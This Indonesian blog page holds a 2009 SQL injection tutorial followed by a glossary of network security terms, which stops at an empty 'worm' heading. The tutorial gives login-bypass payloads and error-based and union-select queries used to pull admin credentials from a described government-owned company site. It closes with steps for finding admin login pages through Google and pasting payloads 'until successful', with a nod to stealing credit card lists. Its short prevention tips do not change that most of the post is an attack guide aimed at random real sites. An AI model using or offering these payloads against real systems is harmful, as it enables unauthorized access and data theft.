Rabu, 29 April 2009

SQL Injection

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. Untuk melakukan hal ini dapat digunakan progam seperti softice.

Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan port yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tool ke situs tersebut yang konon system yang seharga 152 milyar itu keamanannya berlapis lapis.

Basik atau dasar dari teknik hacking yang dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang terproteksi sebagai siapa saja dengan hanya mengetahui username tanpa harus mengetahui passwordnya bahkan kita juga dapat login tanpa perlu mengetahui username dan password sama sekali

Statement sql bukanlah bahasa pemrograman seperti pascal,Delphi atau visual basic, statemen sql biasanya digunakan bersama sama dengan bahasa pemrograman lain pada saat mengakses database , pada ilustrasi diatas , untuk mencocokan user yang login, maka digunakan statemen sql yang kurang lebih sebagai berikut:

Select * from admin where username = input_username And password = input_password

Sebagai contoh apabila penulis sebagai administrator dengan username = administrator dan password = admin bermaksud login maka sql statemennya sebagai berikut

Select * from admin where username = ‘administrator’ and Password = ‘admin’

Dapat dipastikan bahwa apabila field username terdapat record administrator dengan filed password terdapat admin penulis dapat melewati proteksi dan masuk kehalaman berikutnya ,akan tetapi apabila sebaliknya ,maka akan keluar pesan kesalahan yang kurang lebih isinya kita tidak dapat masuk ke halaman berikutnya , lalu bagaimana kalau penulis memasukan input
‘ or ‘’=’ pada username dan password , perhatikan perubahan statemen sql berikut ini

Select * from admin where username = ‘’ or ‘’ = ‘’ and Password = ‘’ or ‘’=’’
Logika OR menyebabkan statement membalikan nilai false jadi true sehingga kita dapat masuk sebagai user yang terdapat pada record pertama dalam table admin ( record pertama biasanya administrator) , dan bagaimana kalo kita hanya mengetahui username saja tapi passwordnya tidak , misalkan username = administrator , caranya cukup sederhana , pada text box tempat menginput username isi dengan
“administrator’—“ sedangkan pada textbox password boleh diisi sembarang misalkan ‘ or ‘’=’ maka statement sql akan berubah menjadi

Select * from admin where username = ‘ administrator ‘—“ And password = ‘’ or ‘’=’’

Tanda “—“ (dua tanda minus) di sql server berarti akhir dari statement sql sehingga perintah dibelakannya tidak dieksekusi lagi.
Untuk web admin , bagaimana cara mencegahnya , jangan izinkan user menginput selain karakter a - z atau A - Z atau 0 – 9 , selain dari pada itu ditolak pada saat pengecekan.

Sebagai contoh dari penerapan hacking menggunakan teknik SQL Injection dari salah satu situs di Indonesia yang tentunya alamat situs tersebut tidak sebenarnya, penulis mencoba mencari situs yang masih rentan terhadap bug SQL Injection dan beruntung mandapatkannya yaitu perusahaan BUMN dengan alamat situs www.alamatsitus.co.id/admin/login.asp , lagi-lagi situs ini bermasalah dalam hal opsi login masuk ke web admin, pertama , penulis mencoba masuk menggunakan teknik yang biasa digunakan yaitu memasukan
‘ or ‘’=’ pada textbox user id passwordnya dan berhasil masuk sebagai admin , tentunya kita belum puas cuman dapat masuk saja dan merubah rubah informasi pada tampilan situs tersebut , kita ingin lebih dalam lagi yaitu table dan field apa yang ada disitus tersebut , di mulai dari mencoba mengetahui table dan field apa yang digunakan sebagai database untuk menyimpan data user dan password , dengan memanfaatkan pesan kesalahan yang terjadi setelah mengetik perintah ' having 1=1— pada user id dan password terserah dan muncul error sebagai berikut :

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_USER.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/admin/login.asp, line 7
--------------------

Keluarlah nama field pertama kita !!!
Catat nama tabel : T_USER
Catat nama field : NOMOR

Dari informasi diatas kita sudah mendapatkan nama tablenya yaitu T_USER dan field pertamanya NOMOR , selanjutnya mencari field kedua dan seterusnya dengan mengetikan perintah
' group by T_USER.NOMOR having 1=1— dan keluar error sebagai berikut

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_USER.USERNAME' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/admin/login.asp, line 7

Artinya itulah nama tabel dan field kedua kita.
Catat : T_USER.USERNAME
Kemudian kita cari field ke tiga :

' group by T_USER.NOMOR,T_USER.USERNAME having 1=1—

dan keluar pesan error:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_USER.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/admin/login.asp, line 7

Catat field ke tiga : T_USER.PASSWORD.

Dan lakukan mencari informasi field dield yang ada sampai field yang terakhir , penulis mendapatkan field field seperti dibawah ini

- T_USER.NOMOR
- T_USER.USERNAME
- T_USER.PASSWORD
- T_USER.STATUS
- T_USER.AUTHORITY

Selajutnya penulis mencari username dan password yang sah untuk masuk tanpa menggunakan perintah SQL , perintahnya sebagai berikut

' union select min(USERNAME),1,1,1,1 from T_USER where USERNAME > 'a'—

artinya kita memilih minimum nama user yang lebih besar dari 'a' dan mencoba mengkonvert- nya ke tipe integer , Arti angka 1 sebanyak 4 kali itu adalah bahwa kita hanya memilih kolom USERNAME, dan mengabaikan 4 kolom yang lain. dan keluar pesan

error :

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'kristian' to
a column of data type int.
/admin/login.asp, line 7
lihat :
varchar value 'kristian '
'kristian' itu adalah nama user di record yang terakhir dimasukkan, atau isi kolom
username di record yang terakhir dimasukkan, Selanjutnya kita inject :

' union select min(PASSWORD),1,1,1,1 from T_USER where USERNAME = 'kristian'—
catatan : harus sebaris (tidak dipotong) dan keluar error :

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'passport' to a
column of data type int.
/admin/login.asp, line

Artinya kita berhasil !!! ,Kita dapatkan
- USERNAME = kristian
- PASSWORD = passport

Bug SQL Injection berbahaya ?


1)
Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. 2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3)
Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

Apa saja yang diperlukan untuk melakukan SQL Injection ?


1) Internet Exploler / Browser

2) PC yang terhubung internet
3) Program atau software seperti softice


Penanganan SQL Injection

1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

Implementasi SQL Injection

1) Masuk ke google atau browse yg lain

2) Masukkan salah satu keyword berikut

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}

3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).

4) Masukkan kode berikut :

User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)

5)Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain.
Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.

7) Banyak variasi kode yang mungkin, antara lain :

User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel


Cara pencegahan SQL INJECTION

1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.

2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).

3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.

5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.





Sumber : Berbagai sumber

Sabtu, 04 April 2009

Keamanan Jaringan Komputer

1. HACKER / HACKING

Terminologi Hacker muncul pada tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technologi (MIT).Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe.

Kata Hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program computer yang lebih baik ketimbang yang telah dirancang bersama.

Menurut Mansfield, Hacker didefinisikan sebagai seseorang yang memiliki keinginan untuk melakukan eksplorasi dan penetrasi terhadap sebuah system operasi dan kode komputer pengaman lainnya, tetapi tidak melakukan tindakan pengrusakan apapun, tidak mencuri uang atau informasi.

Hacker juga memiliki kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul: Heroes Of The Computer Revolution, pada tahun 1984, yaitu:

· Akses ke sebuah system computer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali.

· Segala informasi haruslah gratis.

· Jangan percaya pada otoritas, promosikanlah desentralisasi

· Hacker haruslah dinilai dari sudut pandang aktifitas Hackingnya, bukan berdasarkan standar organisasi formal atau criteria yang tidak relevan seperti derajat, usia, suku maupun posisi.

· Seseorang dapat menciptakan karya seni dan keindahan di computer.

· Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

2. VULNERABILITY

Vulnerability adalah istilah yang keamanan komputernya untuk kelemahan suatu system yang mengijinkan penyerang untuk merusak integritas system tersebut.

3. TROJAN HORSE

Trojan horse atau Kuda Troya, dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Dapat disebut sebagai Trojan saja (membuang kata horse).

Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:

Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.

Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Yunani bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.

Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang hacker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.

Beberapa jenis Trojan yang beredar antara lain adalah:

· Pencuri password: Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas Security Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pengguna dengan membuat tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) serta menunggu pengguna untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya digunakan untuk menambah keamanan password dalam sistem operasi Windows NT, tapi disalahgunakan menjadi sebuah program pencuri password.

· Pencatat penekanan tombol (keystroke logger/keylogger): Jenis Trojan ini akan memantau semua yang diketikkan oleh pengguna dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal tersebut melakukan hal yang serupa (memata-matai pengguna).

· Tool administrasi jarak jauh (Remote Administration Tools/RAT): Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kontrol secara penuh terhadap sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.

· DDoS Trojan atau Zombie Trojan: Jenis Trojan ini digunakan untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi terhadap host target.

· Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus.

Mendeteksi keberadaan Trojan merupakan sebuah tindakan yang agak sulit dilakukan. Cara termudah adalah dengan melihat port-port mana yang terbuka dan sedang berada dalam keadaan "listening", dengan menggunakan utilitas tertentu semacam Netstat. Hal ini dikarenakan banyak Trojan berjalan sebagai sebuah layanan sistem, dan bekerja di latar belakang (background), sehingga Trojan-Trojan tersebut dapat menerima perintah dari penyerang dari jarak jauh. Ketika sebuah transmisi UDP atau TCP dilakukan, tapi transmisi tersebut dari port (yang berada dalam keadaan "listening") atau alamat yang tidak dikenali, maka hal tersebut bisa dijadikan pedoman bahwa sistem yang bersangkutan telah terinfeksi oleh Trojan Horse.

Cara lainnya yang dapat digunakan adalah dengan membuat sebuah "snapshot" terhadap semua berkas program (*.EXE, *.DLL, *.COM, *.VXD, dan lain-lain) dan membandingkannya seiring dengan waktu dengan versi-versi terdahulunya, dalam kondisi komputer tidak terkoneksi ke jaringan. Hal ini dapat dilakukan dengan membuat sebuah checksum terhadap semua berkas program (dengan CRC atau MD5 atau mekanisme lainnya). Karena seringnya Trojan dimasukkan ke dalam direktori di mana sistem operasi berada (\WINDOWS atau \WINNT untuk Windows atau /bin, /usr/bin, /sbin, /usr/sbin dalam keluarga UNIX), maka yang patut dicurigai adalah berkas-berkas yang berada di dalam direktori tersebut. Banyak berkas yang dapat dicurigai, khususnya berkas-berkas program yang memiliki nama yang mirip dengan berkas yang "baik-baik" (seperti "svch0st.exe", dari yang seharusnya "svchost.exe", sebuah berkas yang dijalankan oleh banyak layanan sistem operasi Windows) dapat dicurigai sebagai Trojan Horse.

Cara terakhir adalah dengan menggunakan sebuah perangkat lunak antivirus, yang dilengkapi kemampuan untuk mendeteksi Trojan yang dipadukan dengan firewall yang memonitor setiap transmisi yang masuk dan keluar. Cara ini lebih efisien, tapi lebih mahal, karena umumnya perangkat lunak antivirus yang dipadukan dengan firewall memiliki harga yang lebih mahal dibandingkan dengan dua cara di atas (yang cenderung "gratis"). Memang, ada beberapa perangkat yang gratis, tapi tetap saja dibutuhkan waktu, tenaga dan uang untuk mendapatkannya (mengunduhnya dari Internet).

Berikut ini adalah contoh penggunaan utilitas Netstat dalam Windows XP Professional

C:\>netstat -a –b

Active Connections

Proto Local Address Foreign Address State PID

TCP windows-xp:epmap 0.0.0.0:0 LISTENING 956

c:\windows\system32\WS2_32.dll
C:\WINDOWS\system32\RPCRT4.dll
c:\windows\system32\rpcss.dll
C:\WINDOWS\system32\svchost.exe
-- unknown component(s) –

[svchost.exe]

TCP windows-xp:microsoft-ds 0.0.0.0:0 LISTENING 4

[System]

TCP windows-xp:50300 0.0.0.0:0 LISTENING 1908

[oodag.exe]

TCP windows-xp:1025 0.0.0.0:0 LISTENING 496

[alg.exe]

TCP windows-xp:1030 0.0.0.0:0 LISTENING 1252

[ccApp.exe]

UDP windows-xp:microsoft-ds *:* 4

[System]

UDP windows-xp:4500 *:* 724

[lsass.exe]

UDP windows-xp:isakmp *:* 724

[lsass.exe]

UDP windows-xp:1900 *:* 1192

c:\windows\system32\WS2_32.dll
c:\windows\system32\ssdpsrv.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\kernel32.dll
[svchost.exe]

UDP windows-xp:ntp *:* 1036

c:\windows\system32\WS2_32.dll
c:\windows\system32\w32time.dll
ntdll.dll
C:\WINDOWS\system32\kernel32.dll
[svchost.exe]

4. THREAT

Threat adalah situasi yang merupakan ancaman bagi organisasi yang datang dari luar organisasi dan dapat mengancam eksistensi organisasi dimasa depan.

5. Denial of Service Attack

Didalam keamanan computer, Denial of Service Attack (DOS Attack) adalah suatu usaha untuk membuat suatu sumber daya computer yang ada tidak bisa digunakan oleh para pemakai.

Secara khas target adalah High_profile web server, serangan ini mengarahkan menjadikan host halaman web tidak ada di internet.

Hal ini merupakan suatu kejahatan computer yang melanggar kebijakan penggunaan internet yang diindikasikan oleh internet arsitecture broad (IAB).

Denial Of service Attack mempunyai dua format umum:

· Memaksa computer-komputer korban untuk mereset atau korban tidak bisa lagi menggunakn perangkat komputernya seperti yang diharapkannya

· Menghalangi media komunikasi antara para pemakai dan korban sehingga mereka tidak bisa lagi berkomunikasi.

Denial of Service Attack ditandai oleh suatu usaha eksplisit dengan penyerang untuk mencegah para pemakai member bantuan dari penggunaan jasa tersebut, contohnya meliputi:

· Mencoba untuk membanjiri suatu jaringan, dengan demikian mencegah lalu lintas jaringan yang ada.

· Berusaha untuk mengganggu koneksi antara dua mesin, dengan demikian mencegah akses kepada suatu service.

· Berusaha untuk mencegah individu tertentu dari mengakses suatu service.

· Berusaha untuk mengganggu service kepada suatu orang atau system spesifik.

6. Exploit

Exploit adalah sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Memang ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka menemukannya, mereka melaporkan hasil temuan ke produsen agar produsen dapat mengambil tindakan. Meskipun demikian, exploit kadang menjadi bagian dari suatu malware yang bertugas menyerang kerapuhan keamanan.

7. CRACKER

Cracker adalah sisi gelap dari hacker dan memiliki ketertarikan untuk mencuri informasi, melakukan berbagai macam kerusakan dan sesekali waktu juga melumpuhkan keseluruhan system computer.

Penggolongan Hacker dan Cracker

· Recreational Hacker, adalah kejahatan yang dilakukan oleh netter tingkat pemula untuk sekedar mencoba kekuranghandalan system securitas suatu perusahaan.

· Cracker/Criminal Minded Hacker, adalah pelaku yang memiliki motivasi untuk mendapat keuntungan financial, sabotase dan pengerusakan data.Tipe kejahatan ini dapat dilakukan dengan bantuan orang dalam.

· Political Hacker, aktifis politis (Hacktifis) melakukan pengrusakan terhadap ratusan situs web untuk mengkampanyekan programnya atau ada ikut campurnya programmer ditakuti orang-orang tapi disenngi oleh perusahaan-perusahaan, bahkan tidak jarang dipergunakan untuk menempelkan pesan untuk mendiskreditkan lawannya

8. Bandwidth

Lebar pita (bahasa Inggris: bandwidth) dalam teknologi komunikasi adalah perbedaan antara frekuensi terendah dan frekuensi tertinggi dalam rentang tertentu. Sebagai contoh, line telepon memiliki bandwidth 3000Hz (Hertz), yang merupakan rentang antara frekuensi tertinggi (3300Hz) dan frekuensi terendah (300Hz) yang dapat dilewati oleh line telepon ini.

Pengertian Bandwidth

Bandwidth adalah luas atau lebar cakupan frekuensi yang digunakan oleh sinyal dalam medium transmisi. Dalam kerangka ini, Bandwidth dapat diartikan sebagai perbedaan antara komponen sinyal frekuensi tinggi dan sinyal frekuensi rendah. frekuensi sinyal diukur dalam satuan Hertz. sinyal suara tipikal mempunyai Bandwidth sekitar 3 kHz, analog TV broadcast (TV) mempunyai Bandwidth sekitar 6 MHz. Bandwidth diartikan juga sebagai takaran jarak frekuensi. Dalam bahasa mudahnya, adalah sebuah takaran lalu lintas data yang masuk dan yang keluar. Dalam dunia hosting, kita di berikan jatah Bandwidth setiap bulan tergantung seberapa dalam kita merogoh kocek. Habisnya Bandwidth ditentukan seberapa banyak kita mengupload atau mendownload. Makin banyak anda melakukan aktivitas upload, ditambah makin banyaknya pengunjung yang mengakses, maka makin berkurang jatah Bandwidth yang diberikan. Misalkan, www.namasitus.com diberi jatah Bandwidth sebesar 1,5 Giga dalam sebulan. Dan sudah sejak bulan Desember rasanya jatah Bandwidth yang diberikan kurang. Pada bulan Desember, jatah Bandwidth habis sehari sebelum tahun baru. Dan berturut-turut bulan Januari, Februari, Maret dan April habis dalam 3 minggu. Otomatis, dalam seminggu terakhir didats.net tidak bisa diakses.

Digital Bandwidth

Digital Bandwidth Digital Bandwidth adalah jumlah atau volume data yang dapat dikirimkan melalui sebuah saluran komunikasi dalam satuan bits per second tanpa distorsi. Analog Bandwith

Analog Bandwidth

Sedangkan analog Bandwidth adalah perbedaan antara frekuensi terendah dengan frekuensi tertinggi dalam sebuah rentang frekuensi yang diukur dalam satuan Hertz (Hz) atau siklus per detik, yang menentukan berapa banyak informasi yang bisa ditransimisikan dalam satu saat.

Bandwidth Komputer

Bandwidth Komputer Di dalam jaringan Komputer, Bandwidth sering digunakan sebagai suatu sinonim untuk data transfer rate yaitu jumlah data yang dapat dibawa dari sebuah titik ke titik lain dalam jangka waktu tertentu (pada umumnya dalam detik). Jenis Bandwidth ini biasanya diukur dalam bps (bits per second). Adakalanya juga dinyatakan dalam Bps (bytes per second). Suatu modem yang bekerja pada 57,600 bps mempunyai Bandwidth dua kali lebih besar dari modem yang bekerja pada 28,800 bps. Secara umum, koneksi dengan Bandwidth yang besar/tinggi memungkinkan pengiriman informasi yang besar seperti pengiriman gambar/images dalam video presentation.

Alokasi Bandwidth

Alokasi Bandwidth Alokasi atau reservasi Bandwidth adalah sebuah proses menentukan jatah Bandwidth kepada pemakai dan aplikasi dalam sebuah jaringan. Termasuk didalamnya menentukan prioritas terhadap berbagai jenis aliran data berdasarkan seberapa penting atau krusial dan delay-sensitive aliran data tersebut. Hal ini memungkinkan penggunaan Bandwidth yang tersedia secara efisien, dan apabila sewaktu-waktu jaringan menjadi lambat, aliran data yang memiliki prioritas yang lebih rendah dapat dihentikan, sehingga aplikasi yang penting dapat tetap berjalan dengan lancar. Besarnya saluran atau Bandwidth akan berdampak pada kecepatan transmisi. Data dalam jumlah besar akan menempuh saluran yang memiliki Bandwidth kecil lebih lama dibandingkan melewati saluran yang memiliki Bandwidth yang besar. Kecepatan transmisi tersebut sangat dibutuhkan untuk aplikasi Komputer yang memerlukan jaringan terutama aplikasi real-time, seperti video conferencing. Penggunaan Bandwidth untuk LAN bergantung pada tipe alat atau medium yang digunakan, umumnya semakin tinggi Bandwidth yang ditawarkan oleh sebuah alat atau medium, semakin tinggi pula nilai jualnya. Sedangkan penggunaan Bandwidth untuk WAN bergantung dari kapasitas yang ditawarkan dari pihak ISP, perusahaan harus membeli Bandwidth dari ISP, dan semakin tinggi Bandwidth yang diinginkan, semakin tinggi pula harganya. sebuah teknologi jaringan baru dikembangkan dan infrastruktur jaringan yang ada diperbaharui, aplikasi yang akan digunakan umumnya juga akan mengalami peningkatan dalam hal konsumsi Bandwidth. Video streaming dan Voice over IP ([[VoIP]]) adalah beberapa contoh penggunaan teknologi baru yang turut mengkonsumsi Bandwidth dalam jumlah besar.

Tips Menghemat Bandwidth Internet

Tips Menghemat Bandwidth Internet Tips ini sangat berguna jika anda memasang internet yang menggunakan paket quota Bandwidth / Volume Based.

· Menonaktifkan fungsi untuk load images dan sound. Jika anda melakukan browsing ke suatu situs dan hanya membutuhkan info text nya saja di situs tersebut anda bisa menonaktifkan fungsi untuk load images dan sound. Untuk Firefox : Tools -> Options -> Content Untuk IE : Tools -> Internet Options -> Advanced

· Mematikan setting update automatic. Mematikan setting update automatic pada windows, antivirus maupun software yang lain dan pindah ke setting ke manual update. Karena ada beberapa program yang kita install melakukan download update secara automatis.

· Install Add-ons Adblock Plus. Plugin ini berfungsi untuk mengeblok iklan-iklan yang muncul di suatu situs kalo kita membuka situs tersebut. Untuk firefox anda bisa menginstall add-ons Adblock plus (https://addons.mozilla.org/en-US/firefox/addon/1865). add-ons firefox ini mampu mengeblok iklan gambar dan iklan flash.

· Menggunakan program kompresi images seperti toolnel. Dengan program ini, maka data akan dikompres terlebih dahulu sebelum masuk ke Komputer kita. Anda bisa mendownload di http://www.toonel.net/downloads.html

· Menggunakan Web mail yang support AJAX Gunakan layanan email yang support AJAX dimana tampilan bekerja efisien sehingga data yang kita download lebih kecil. Web mail yang support AJAX antara lain GMail dan Yahoo Mail dengan versi barunya.

· Gunakan salah satu browser saja. Gunakan salah satu browser saja, misalnya kalau Firefox gunakanlah Firefox terus, kl Internet Explorer gunakanlah Internet Explorer terus, jangan berpindah-pindah, karena setiap browser memiliki cache sendiri, sehingga jika Anda membuka situs yang sudah pernah anda kunjungi, maka browser tersebut tidak akan mendownload seluruh data lagi, karena beberapa sudah tersimpan di browser Komputer anda berupa cache.

9. DIGITAL SIGNATURE

Digital Signature adalah sebuah pengaman pada data digital yang dibuat dengan kunci tanda tangan pribadi (Private Signature Key), yang penggunannya tergantung pada kunci public yang menjadi pasangannya.

10. DEFACED

Defaced diartikansebagai aktifitas menodai atau merubah isi suatu halaman web.

11. PATCH

Patch adalah bagian kecil dari perangkat software untuk menyelesaikan masalah software tersebut atau mengupdate program computer mengsupport data.

12. IP ADDRESS

Alamat IP (Internet Protocol Address atau sering disingkat IP) adalah deretan angka biner antar 32-bit sampai 128-bit yang dipakai sebagai alamat identifikasi untuk tiap komputer host dalam jaringan Internet. Panjang dari angka ini adalah 32-bit (untuk IPv4 atau IP versi 4), dan 128-bit (untuk IPv6 atau IP versi 6) yang menunjukkan alamat dari komputer tersebut pada jaringan Internet berbasis TCP/IP.

Sistem pengalamatan IP ini terbagi menjadi dua, yakni:

IP versi 4 (IPv4)

IP versi 6 (IPv6)

13. Telnet

Telnet (Telecommunication network) adalah sebuah protokol jaringan yang digunakan di koneksi Internet atau Local Area Network. TELNET dikembangkan pada 1969 dan distandarisasi sebagai IETF STD 8, salah satu standar Internet pertama. TELNET memiliki beberapa keterbatasan yang dianggap sebagai risiko keamanan.

14. File Transfer Protocol (FTP)

FTP (singkatan dari File Transfer Protocol) adalah sebuah protokol Internet yang berjalan di dalam lapisan aplikasi yang merupakan standar untuk pentransferan berkas (file) komputer antar mesin-mesin dalam sebuah internetwork.

FTP merupakan salah satu protokol Internet yang paling awal dikembangkan, dan masih digunakan hingga saat ini untuk melakukan pengunduhan (download) dan penggugahan (upload) berkas-berkas komputer antara klien FTP dan server FTP. Sebuah Klien FTP merupakan aplikasi yang dapat mengeluarkan perintah-perintah FTP ke sebuah server FTP, sementara server FTP adalah sebuah Windows Service atau daemon yang berjalan di atas sebuah komputer yang merespons perintah-perintah dari sebuah klien FTP. Perintah-perintah FTP dapat digunakan untuk mengubah direktori, mengubah modus transfer antara biner dan ASCII, menggugah berkas komputer ke server FTP, serta mengunduh berkas dari server FTP.

Sebuah server FTP diakses dengan menggunakan Universal Resource Identifier (URI) dengan menggunakan format ftp://namaserver.Klien FTP dapat menghubungi server FTP dengan membuka URI tersebut.

Cara kerja protokol FTP

FTP menggunakan protokol Transmission Control Protocol (TCP) untuk komunikasi data antara klien dan server, sehingga di antara kedua komponen tersebut akan dibuatlah sebuah sesi komunikasi sebelum transfer data dimulai. Sebelum membuat koneksi, port TCP nomor 21 di sisi server akan "mendengarkan" percobaan koneksi dari sebuah klien FTP dan kemudian akan digunakan sebagai port pengatur (control port) untuk (1) membuat sebuah koneksi antara klien dan server, (2) untuk mengizinkan klien untuk mengirimkan sebuah perintah FTP kepada server dan juga (3) mengembalikan respons server ke perintah tersebut. Sekali koneksi kontrol telah dibuat, maka server akan mulai membuka port TCP nomor 20 untuk membentuk sebuah koneksi baru dengan klien untuk mentransfer data aktual yang sedang dipertukarkan saat melakukan pengunduhan dan penggugahan.

FTP hanya menggunakan metode autentikasi standar, yakni menggunakan username dan password yang dikirim dalam bentuk tidak terenkripsi. Pengguna terdaftar dapat menggunakan username dan password-nya untuk mengakses, men-download, dan meng-upload berkas-berkas yang ia kehendaki. Umumnya, para pengguna terdaftar memiliki akses penuh terhadap beberapa direktori, sehingga mereka dapat membuat berkas, membuat direktori, dan bahkan menghapus berkas. Pengguna yang belum terdaftar dapat juga menggunakan metode anonymous login, yakni dengan menggunakan nama pengguna anonymous dan password yang diisi dengan menggunakan alamat e-mail.

15. worm

